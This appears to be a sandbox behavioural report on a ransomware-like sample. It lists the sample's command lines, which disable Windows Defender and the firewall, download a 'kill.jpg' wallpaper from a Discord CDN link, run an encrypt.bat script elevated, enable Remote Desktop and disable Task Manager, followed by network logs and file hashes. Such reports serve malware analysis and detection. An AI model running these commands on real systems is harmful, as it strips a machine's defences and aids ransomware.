powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 101.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI11002\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI11002\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI11002\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI11002\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI11002\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI11002\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI11002\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI11002\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI11002\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI11002\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/4844-211-0x00007FF979283000-0x00007FF979285000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eqszlfd1.gko.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4844-220-0x00007FF979280000-0x00007FF979D42000-memory.dmp

memory/4844-221-0x0000027CD65E0000-0x0000027CD6602000-memory.dmp

memory/4844-222-0x00007FF979280000-0x00007FF979D42000-memory.dmp

memory/4844-223-0x00007FF979280000-0x00007FF979D42000-memory.dmp

memory/4844-224-0x00007FF979280000-0x00007FF979D42000-memory.dmp

memory/4844-227-0x00007FF979280000-0x00007FF979D42000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 704d4cabea796e63d81497ab24b05379
SHA1 b4d01216a6985559bd4b6d193ed1ec0f93b15ff8
SHA256 3db2f8ac0fb3889fcf383209199e35ac8380cf1b78714fc5900df247ba324d26
SHA512 0f4803b7b7396a29d43d40f971701fd1af12d82f559dcfd25e0ca9cc8868a182acba7b28987142c1f003efd7dd22e474ac4c8f01fe73725b3618a7bf3e77801d

C:\Encrypt\encrypt.bat

MD5 7a2773f461b2f4672ceb202de1104e08
SHA1 cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
SHA256 522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
SHA512 df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b

\??\pipe\LOCAL\crashpad_2640_FTTKPNRUGKRSWMSG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 de47c3995ae35661b0c60c1f1d30f0ab
SHA1 6634569b803dc681dc068de3a3794053fa68c0ca
SHA256 4d063bb78bd4fa86cee3d393dd31a08cab05e3539d31ca9f0a294df754cd00c7
SHA512 852a9580564fd4c53a9982ddf36a5679dbdce55d445b979001b4d97d60a9a688e532821403322c88acc42f6b7fa9cc5e964a79cbe142a96cbe0f5612fe1d61cb

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 aed2dca6e7d2058d2ffbb0a75faf4613
SHA1 84bb5bf66a467a1b5b1663b2e6c0a71702fdb128
SHA256 361cf8e5a9e1d239de990d3baa395cc2290d6b9d8c44540c032da6bcbf4676e4
SHA512 49e5ae6ae23c7b2b183a715367b1a11117052946354c5a201a73005bad3bdcd180ef4e0ab50a89180616e55aec4890ff781af0a26b540b5b87820cf0fe850152

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA1 9910190edfaccece1dfcc1d92e357772f5dae8f7
SHA256 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA512 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e07eea85a8893f23fb814cf4b3ed974c
SHA1 8a8125b2890bbddbfc3531d0ee4393dbbf5936fe
SHA256 83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea
SHA512 9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4914eb0b2ff51bfa48484b5cc8454218
SHA1 6a7c3e36ce53b42497884d4c4a3bda438dd4374b
SHA256 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e
SHA512 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8858c1312fd419c51df9a8a7654bbf0
SHA1 9a0ef19d9d1470f77b96ac9ab2613cd4d6a2f0f9
SHA256 8b8956bda78c94508b509771d05b88cbdeb3ae8fb2fd2dee091bc68905a8142f
